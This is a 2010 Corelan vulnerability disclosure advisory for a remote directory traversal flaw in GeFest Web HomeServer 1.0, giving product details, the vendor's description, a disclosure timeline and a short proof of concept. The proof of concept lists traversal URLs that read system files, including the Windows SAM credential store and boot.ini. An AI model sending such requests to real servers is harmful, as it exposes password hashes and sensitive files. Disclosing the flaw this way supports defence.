CORELAN-10-010 - GeFest Web HomeServer v1.0 Remote Directory Traversal Vulnerability



|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@xxxxxxxxxx |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|

Advisory : CORELAN-10-010
Disclosure date : February 8th, 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : GeFest Web HomeServer
[*] Version : 1.0
[*] URL : http://clearweb.org.ua/
[*] Platform : Windows
[*] Type of vulnerability : Remote Directory Traversal
[*] Risk rating : High (possible access to sensitive files)
[*] Issue fixed in version : 1.2
[*] Vulnerability discovered by : MarkoT
[*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT,
sinn3r, Jacky 'Redsees' & jnz


0x01 : Vendor description of software
-------------------------------------
From the vendor website:

"""Gefest Web Home Server is a Simple Web Server with Graphical User interface.
Server allow watch video directly from another pc.
Server allow create software storage.
Server support password protection.
Server allow review all user activity (Server log and Activity log)
Share your folders in internet or local network.
Add / Remove folders with use simple interface."""


0x02 : Vulnerability details
----------------------------
By default, the utility runs as an application (and it's very likely that people will run this with administrator privileges)
The discovered vulnerability allows an attacker to access files outside of the web application root.

PoC :
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\calc.exe
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32\config\sam
http://192.168.1.200:8080/\../\../\../WINDOWS\SYSTEM32
http://192.168.1.200:8080/\../\../\../boot.ini



0x03 : Vendor communication
---------------------------
[*] February 4th, 2010 - Vendor contacted
[*] February 5th, 2010 - Version 1.20 released
[*] February 8th, 2010 - Public disclosure



Relevant Pages

  • [UNIX] Multiple Vendor X Server Vulnerabilities (XFree86-Misc, EVI, MIT-SHM, TOG-CUP, XI
    ... Multiple Vendor X Server Vulnerabilities (XFree86-Misc, EVI, MIT-SHM, ... Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index ... Local exploitation of an invalid array index vulnerability in the X.Org X ...
    (Securiteam)
  • SecurityFocus Microsoft Newsletter #142
    ... MICROSOFT VULNERABILITY SUMMARY ... Mollensoft Enceladus Server Suite Clear Text Password Storage... ... FakeBO Syslog Format String Vulnerability ... Methodus 3 Web Server File Disclosure Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #139
    ... OFF any Windows 2000 Managed Dedicated Hosting Solution from Interland. ... Sun ONE Application Server Plaintext Password Vulnerability ... Batalla Naval Remote Buffer Overflow Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #140
    ... Cafelog b2 Remote File Include Vulnerability ... Webfroot Shoutbox Remote Command Execution Vulnerability ... Pablo Software Solutions Baby POP3 Server Multiple Connection... ... Microsoft Windows XP Nested Directory Denial of Service... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter # 150
    ... - automatically set positive security policies for real-time protection, ... MICROSOFT VULNERABILITY SUMMARY ... Meteor FTP Server USER Memory Corruption Vulnerability ... MDaemon SMTP Server Null Password Authentication Vulnerabili... ...
    (Focus-Microsoft)